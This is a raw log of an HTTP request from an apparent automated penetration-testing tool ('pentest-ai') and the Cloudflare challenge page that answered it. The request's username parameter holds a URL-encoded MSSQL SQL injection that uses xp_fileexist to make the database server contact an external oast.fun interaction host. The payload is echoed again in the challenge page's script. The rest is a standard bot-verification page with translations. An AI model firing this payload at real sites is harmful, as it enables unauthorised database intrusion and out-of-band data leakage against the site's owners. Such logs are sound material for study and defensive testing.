REQUEST:
GET https://my.myfirst.tech/search?username=%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9884
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475f7bf8a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=cl8XrLrC%2BmZGf1BCEKNvkHVaFNB6XyoXFZBkWU6D4t%2BS5A3WBqeJiLEQlHDgFxQIMiklSKD3wLdpW9apIJqT6ZbTEZRbB%2FgC4fDnBbwRF3BwrfZPO9dweSWe92jiZdyEzw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475f7bf8a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'LQNk646al7e3V.hLwCydGQJSoseVIdIB0_MpEzJlU00-1784281159-1.2.1.1-94B08OcWiZSaejPhKtbjpxBwzRojiyksI1qaKWkAAiEpWKTkoLyogYKAVkT1lkeu',cITimeS: '1784281159',cRay: 'a1c8475f7bf8a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_tk=aNncC4sUYZXwCyKrqDlxElJXdVUtFY5cbPLeZjB4u3s-1784281159-1.0.1.1-LAoUZ5Q5yFkQQVluoLB_vC.zXbsWfqgwnY32sbMtM5k",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_f_tk=aNncC4sUYZXwCyKrqDlxElJXdVUtFY5cbPLeZjB4u3s-1784281159-1.0.1.1-LAoUZ5Q5yFkQQVluoLB_vC.zXbsWfqgwnY32sbMtM5k",md: 'abtM6Vd2Q4tZqHAArd4oF6MWZlFe45b063E4T8kg5VM-1784281159-1.2.1.1-LKMXzQvtPkAQtnTo9VlbVTf71qXKUz6.STZdOJB.wcGSfJrfsdo_CHrMTeZD109yZ7haW.GDOykm2ONatmuWIoxNHvC9HlfgYWdTsBqyly6EuZg.OLRQJSnGKo2yVkKCMbGc_yKSKcU9KKONDNmNM8w7YaMJeNi3bKOZdN551rv5sNCh9bGNtnZARN6IF9GhUWPsA9WutRHgjfrOTp1LXaQzoXrRrWkPo2CSadHDCM_TKRtekkan4W9dBuv014vipc1Ko5QE8TBpoQPZMv6jTaZY6ZcfI1EVEDYuNQSKEE.9aKGJ24VBFMIb1T_z6FWErf1RBITo90Njsu2McOrb94rjS77UtyUInB.WgB6Xs.D79KRk_9ElD797TANPJYjBOFkRXTlK0gYODrmNIHz1BjM.uIpcPt4UN8QzL1jkA03rbakk5SyPlUU.NjU4lLtOM30DEWirwUGPp7579qagPVd.T4WiiAIm.jvOIWf0jUiPWAF8fKYLL4qe4h_5mpOgCdtOAJJ4kpWaw0yKLYmxy6RpI4hT04oAZmn8eClFYjcHBJYopI5i2XsyugOuN9rb_yuvxk1sze.weq6zvA9WKRDmX2WMQaOba9qHtu_wMtS6mlyMbp8oOWQvPvSZ2cL1D0Oo58vN1c2_cDpgDYW7f2oeKmN_NZFZkKfRSiBCO_H_8lkWlxhPy4aP6ShGIhfp_Jat3cxWzSlKh0XMacXlloQyU3tcVblaIAusw4EjUw8bh2wiVztQPP.GGdNdGL_mOpKLYvgHAjbR36aN5cdoRUK7GhFCEqtnp8d2V9vedp4udzdAgUV9nobKphsI_oEFtQ2t9XtZ7tSOj0KEEAUrIqsCwKM5gS4D.KrcjV3tT0U6vQtFN2ghakYb7i_ZTwcPnXkQ1CothHKRA.lRK6X3Uoes_8etZBnq0AakYjtSeO8..tTjYjz7VEnEKQmoCS5NKfGjTgYlQFHC90dPWEB7y.g96kLUbtrqx14QuWEOip5gNDBDdngjbaRDULyIlz6vcwW7KYa8QyqelrkZvBcv7Z6ml.48gI8mJQY6x.xZXjckrDUiNNGi1jFvHTC7YH52LNv4THS0.d1ya.41a3rp9NNhBYkW7w4zpedhK4Sbr3_AJJpEhrlFGxPwGChompb_rlzNEyXhWqgDyOi2c2wx.Z0NeUvAXH1Jjy3O35VSvqdY3aFHK7vG4Olz6a7599XeqHAVI6YG.7bbknDvpzGXNnQHz4FOLtZloYZmbS3SklWkuF4S6gyF.UEJCUTAIqbgA6PVOwnsAtZrBzF2.DX4zd5_eanoFcEnbcsPpLcdZV7dlp73tMYzqJUeroc5Eri8uEYl3x49eEcDHi_DSeknug',mdrd: 'KIMl.QOLLldqGbN1gsdnyA7RO97vj0ZHDO9eNIjxS2M-1784281159-1.2.1.1-ltrowkGjvnTF5DFwWNZZoAOtag5Cyk1v8gohwm9HyWNcAMd2VqfbQbKLDElxuReuFLiywmqRrY4W.qllJylIo6shJkvnC56QnhtTAO2nI3WfFBVPbosQByrTWMIFbqPiq1U2xb_uma8d3jA9ACNUnL0k7zkbjy9iIetq2UBxaEp8XPxFVLxS9ZE0vYp2q31afI3xuJ1sTXihBgHuuNPVzQ4n6k3rsBoDbdXOtwy..xZHPC8QmxhEFyGmdIsJvtwQ',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475f7bf8a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_rt_tk=aNncC4sUYZXwCyKrqDlxElJXdVUtFY5cbPLeZjB4u3s-1784281159-1.0.1.1-LAoUZ5Q5yFkQQVluoLB_vC.zXbsWfqgwnY32sbMtM5k"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
